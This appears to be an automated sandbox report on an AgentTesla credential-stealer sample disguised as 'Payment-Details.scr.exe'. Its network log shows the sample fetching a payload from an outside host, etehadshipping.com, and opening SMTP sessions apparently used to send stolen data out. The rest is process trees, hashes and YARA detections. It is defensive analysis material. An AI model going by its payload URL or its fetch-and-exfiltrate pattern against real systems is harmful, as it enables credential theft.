                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.8 | 49704 | 5.144.130.41 | 443 | 432 | C:\Users\user\Desktop\Payment-Details.scr.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-20 16:39:24 UTC | 113 | OUT | GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1
                                      Host: etehadshipping.com
                                      Connection: Keep-Alive
                                      2024-08-20 16:39:24 UTC | 208 | IN | HTTP/1.1 200 OK
                                      Connection: close
                                      content-type: application/octet-stream
                                      last-modified: Tue, 20 Aug 2024 13:03:12 GMT
                                      accept-ranges: bytes
                                      content-length: 1261249
                                      date: Tue, 20 Aug 2024 16:39:24 GMT


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.8 | 62398 | 5.144.130.41 | 443 | 6012 | C:\Users\user\AppData\Roaming\Fdimzk.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-20 16:39:58 UTC | 113 | OUT | GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1
                                      Host: etehadshipping.com
                                      Connection: Keep-Alive
                                      2024-08-20 16:39:58 UTC | 208 | IN | HTTP/1.1 200 OK
                                      Connection: close
                                      content-type: application/octet-stream
                                      last-modified: Tue, 20 Aug 2024 13:03:12 GMT
                                      accept-ranges: bytes
                                      content-length: 1261249
                                      date: Tue, 20 Aug 2024 16:39:58 GMT


                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                      Aug 20, 2024 18:39:42.308922052 CEST | 587 | 62397 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:39:42 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:39:42.309283972 CEST | 62397 | 587 | 192.168.2.8 | 163.44.198.71 | EHLO 468325
                                      Aug 20, 2024 18:39:42.655610085 CEST | 587 | 62397 | 163.44.198.71 | 192.168.2.8 | 250-cpanel16wh.bkk1.cloud.z.com Hello 468325 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-STARTTLS
                                      250 HELP
                                      Aug 20, 2024 18:39:42.655831099 CEST | 62397 | 587 | 192.168.2.8 | 163.44.198.71 | STARTTLS
                                      Aug 20, 2024 18:39:43.005271912 CEST | 587 | 62397 | 163.44.198.71 | 192.168.2.8 | 220 TLS go ahead
                                      Aug 20, 2024 18:40:15.469293118 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:14 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:15.469475985 CEST | 62404 | 587 | 192.168.2.8 | 163.44.198.71 | EHLO 468325
                                      Aug 20, 2024 18:40:15.470947981 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:14 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:15.472640038 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:14 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:15.476021051 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:14 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:15.826273918 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 250-cpanel16wh.bkk1.cloud.z.com Hello 468325 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-STARTTLS
                                      250 HELP
                                      Aug 20, 2024 18:40:15.826791048 CEST | 62404 | 587 | 192.168.2.8 | 163.44.198.71 | STARTTLS
                                      Aug 20, 2024 18:40:16.180588007 CEST | 587 | 62404 | 163.44.198.71 | 192.168.2.8 | 220 TLS go ahead
                                      Aug 20, 2024 18:40:23.490655899 CEST | 587 | 62406 | 163.44.198.71 | 192.168.2.8 | 220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:23 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:23.492147923 CEST | 62406 | 587 | 192.168.2.8 | 163.44.198.71 | EHLO 468325
                                      Aug 20, 2024 18:40:23.842611074 CEST | 587 | 62406 | 163.44.198.71 | 192.168.2.8 | 250-cpanel16wh.bkk1.cloud.z.com Hello 468325 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-STARTTLS
                                      250 HELP
                                      Aug 20, 2024 18:40:23.842791080 CEST | 62406 | 587 | 192.168.2.8 | 163.44.198.71 | STARTTLS
                                      Aug 20, 2024 18:40:24.201710939 CEST | 587 | 62406 | 163.44.198.71 | 192.168.2.8 | 220 TLS go ahead


                                      Target ID:0
                                      Start time:12:39:12
                                      Start date:20/08/2024
                                      Path:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Payment-Details.scr.exe"
                                      Imagebase:0xf80000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1692829091.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:12:39:37
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x10000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:12:39:46
                                      Start date:20/08/2024
                                      Path:C:\Users\user\AppData\Roaming\Fdimzk.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Fdimzk.exe"
                                      Imagebase:0x370000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 18%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:12:39:55
                                      Start date:20/08/2024
                                      Path:C:\Users\user\AppData\Roaming\Fdimzk.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Fdimzk.exe"
                                      Imagebase:0xa70000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:12:40:10
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0xb00000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:9
                                      Start time:12:40:19
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x9e0000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false


                                        Execution Graph

                                        Execution Coverage:13.2%
                                        Dynamic/Decrypted Code Coverage:98.1%
                                        Signature Coverage:11.7%
                                        Total number of Nodes:377
                                        Total number of Limit Nodes:19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 1ea3c6783342c95ffd835a3df7d851b3119062562217e1e664ec74943778f26c
                                        • Instruction ID: e675b314615e334a7104ead17ffe64f01595acb6fdef1134539abb81f0022d6d
                                        • Opcode Fuzzy Hash: 1ea3c6783342c95ffd835a3df7d851b3119062562217e1e664ec74943778f26c
                                        • Instruction Fuzzy Hash: 2FB209B4A1021ADFDB14CFA4C894BADB7B6FB88700F158195E905AB3A5DB74DC81CF60

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2
                                        • API String ID: 0-450215437
                                        • Opcode ID: 2303ce1f4b0d853d3d10b16ec53a8523a6a5b26203b1bbd11bcd7c83c8fc0e54
                                        • Instruction ID: 80c9b42350a7a92a86b48de9a844a5a6e31f441aa77b4a35dc4f1135ebd2d6e6
                                        • Opcode Fuzzy Hash: 2303ce1f4b0d853d3d10b16ec53a8523a6a5b26203b1bbd11bcd7c83c8fc0e54
                                        • Instruction Fuzzy Hash: 68C2A2B4E002298FDB65DF69C884B9DBBB6FB89300F1081EAD509A7355DB709E85CF50

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8
                                        • API String ID: 0-4194326291
                                        • Opcode ID: 69fb9cd1e08fcfcd99e6848ea990e1453692c3bcd1e85bb9ba6ac8e10bb4888d
                                        • Instruction ID: e645b5f4644fb11fb7ef5abf1be8a80f4593bbaa2e715255c262f2f15ef08075
                                        • Opcode Fuzzy Hash: 69fb9cd1e08fcfcd99e6848ea990e1453692c3bcd1e85bb9ba6ac8e10bb4888d
                                        • Instruction Fuzzy Hash: CE42B2B5D00629CBDB64DF69C850BD9B7B2BF89300F1486EAD50DA7251DB30AE85CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 405e5c2db889f7e33877800f7193ad851a9e033425b52cda9abed2b407875ed1
                                        • Instruction ID: 781976ed703ec258223a5134583246493159a37586f5250a1ff4a29399f74368
                                        • Opcode Fuzzy Hash: 405e5c2db889f7e33877800f7193ad851a9e033425b52cda9abed2b407875ed1
                                        • Instruction Fuzzy Hash: 0C22FAB4A1021ADFDB14CF64C984BADB7B6FF48300F1581A9D909AB395EB749D81CF60
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06362241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06362241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        APIs
                                        • NtResumeThread.NTDLL(?,?), ref: 0636331E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • NtResumeThread.NTDLL(?,?), ref: 0636331E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87ad796d0f5f12d7df8937e2c94ff645f9a9fa7634aaf84ebaa08a18dd0da997
                                        • Instruction ID: 6240ba5c51f8b432651f1ff9006f7436df2f8f3365f107b0f55c196556790901
                                        • Opcode Fuzzy Hash: 87ad796d0f5f12d7df8937e2c94ff645f9a9fa7634aaf84ebaa08a18dd0da997
                                        • Instruction Fuzzy Hash: 7F410471E00218CBDBA4CF6AD8407DDBBF6FB89300F10D1AAD50AA3256DB745A95CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eb4e1d8d45cde8d2dc61662a2c5e345156d361d0b38d790fcd7ece68a2a7542
                                        • Instruction ID: 29f71e6678a7b82a56be025bf507f3f47ae895a2a0a6f0b3dbbe47323e5d4a75
                                        • Opcode Fuzzy Hash: 7eb4e1d8d45cde8d2dc61662a2c5e345156d361d0b38d790fcd7ece68a2a7542
                                        • Instruction Fuzzy Hash: D171EC709003098FD708DF6AE85579ABBF7FBD8300F14D12AC509AB269EB355895CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a493137ee1eb5fa942f6f0f6d03923d6416c2cc06d09ba017a4f6af78b263c46
                                        • Instruction ID: 193bc919cf4b0e5f18f052539403e9e4951c3d11c5578a06dee35ab4d067c03f
                                        • Opcode Fuzzy Hash: a493137ee1eb5fa942f6f0f6d03923d6416c2cc06d09ba017a4f6af78b263c46
                                        • Instruction Fuzzy Hash: 9E510CB1E006198BEB19CF6BCC4069AFBF7AFC9300F14C1BAD548AB265DB7409858F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a9eadca6a78164ee94896f3232c5de4729bd771b58c08bfcacede8051bea5ab
                                        • Instruction ID: 371a55c071432c10f41ec2e869cab88c593f37df702877e63ef2b5b06b45f8ca
                                        • Opcode Fuzzy Hash: 2a9eadca6a78164ee94896f3232c5de4729bd771b58c08bfcacede8051bea5ab
                                        • Instruction Fuzzy Hash: 035169B1E016199BDB08CFABD94059EFBF3AFC8300F14C17AD958AB264DB3459468F50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: *$4
                                        • API String ID: 0-449253175
                                        • Opcode ID: 053865832f9e932f79566d2a7866dd4946ce3ab65dcb6149ed33225bfacf0254
                                        • Instruction ID: a578f0b6d32478fff34d278863559de76013efa65a6dd859676bd316bbef3dd4
                                        • Opcode Fuzzy Hash: 053865832f9e932f79566d2a7866dd4946ce3ab65dcb6149ed33225bfacf0254
                                        • Instruction Fuzzy Hash: 7B11B374911258CFEBA0CF08D894BE8B7B5FB09314F5094DAC519A7341C7769E86CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2$B
                                        • API String ID: 0-2979277302
                                        • Opcode ID: d8af22df9e297592966ff7da4cabfce190e872d6edb3a82f5a24f0fc01e91726
                                        • Instruction ID: 4e0f1fa419a049f182612e34d1960bb0b21bf45598f403c6ff826aead9511e0d
                                        • Opcode Fuzzy Hash: d8af22df9e297592966ff7da4cabfce190e872d6edb3a82f5a24f0fc01e91726
                                        • Instruction Fuzzy Hash: 4501783090020ADFEF50CF44C844BE9B776FF06300F008598EA5963211C731AE81CF80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %$a
                                        • API String ID: 0-177925489
                                        • Opcode ID: b5e7eccdb8a07576dcc930b232e09f34d466357799e7f6077c26da40254e15f3
                                        • Instruction ID: a515ed03159ab2b9657f77264372d865037ac7b883e7f3b7d72880a40889918f
                                        • Opcode Fuzzy Hash: b5e7eccdb8a07576dcc930b232e09f34d466357799e7f6077c26da40254e15f3
                                        • Instruction Fuzzy Hash: E3F037B0A1436ACFCB208F28DC4879AB7B6BB46305F0451EAD90DA2240D3B40EC4CF06

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        • API call node: 6362a55-6362aca CreateProcessA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9f4a07c0baf218099acc96ae6c72298835ec035b91a9fb28af5487d9c813d77
                                        • Instruction ID: 2d9f0af258eb4fe13e455b0aac6f01fd5b9d48922a3676da4cde40a953b6e189
                                        • Opcode Fuzzy Hash: d9f4a07c0baf218099acc96ae6c72298835ec035b91a9fb28af5487d9c813d77
                                        • Instruction Fuzzy Hash: D6813771D007499FDB60CFAAC8817EEBBF2FF48314F158529E858A7294DB748985CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06362ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 50371098846eb4adebd2ebdf498837c0c76843573088c2b51d03483e0af2d5b5
                                        • Instruction ID: 701d6a1fe4dd314bb8d883685f34c29ee1f0c2f56a35fd79c9e74ab39f57f1f7
                                        • Opcode Fuzzy Hash: 50371098846eb4adebd2ebdf498837c0c76843573088c2b51d03483e0af2d5b5
                                        • Instruction Fuzzy Hash: 01813771D006099FDB50CFAAC8857EEBBF2FF48314F158529E858E7284DB748995CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06362ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 98dfb5dc3a1f8ea615ef88417523b67d5cc839c8a228ce63d6fac764bbbcbab0
                                        • Instruction ID: 46e56704ca61f2ecfa5385a9af99ac709e41e14a6570d5667b7253bddcedc94c
                                        • Opcode Fuzzy Hash: 98dfb5dc3a1f8ea615ef88417523b67d5cc839c8a228ce63d6fac764bbbcbab0
                                        • Instruction Fuzzy Hash: 83814771D006099FDB50CFAAC8857EEBBF2FF48314F158529E858E7284DB748985CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06364199
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: dd29d55e723fc6805ea7a8e3163936285a9d0782635caeca25ef66bc46b2887e
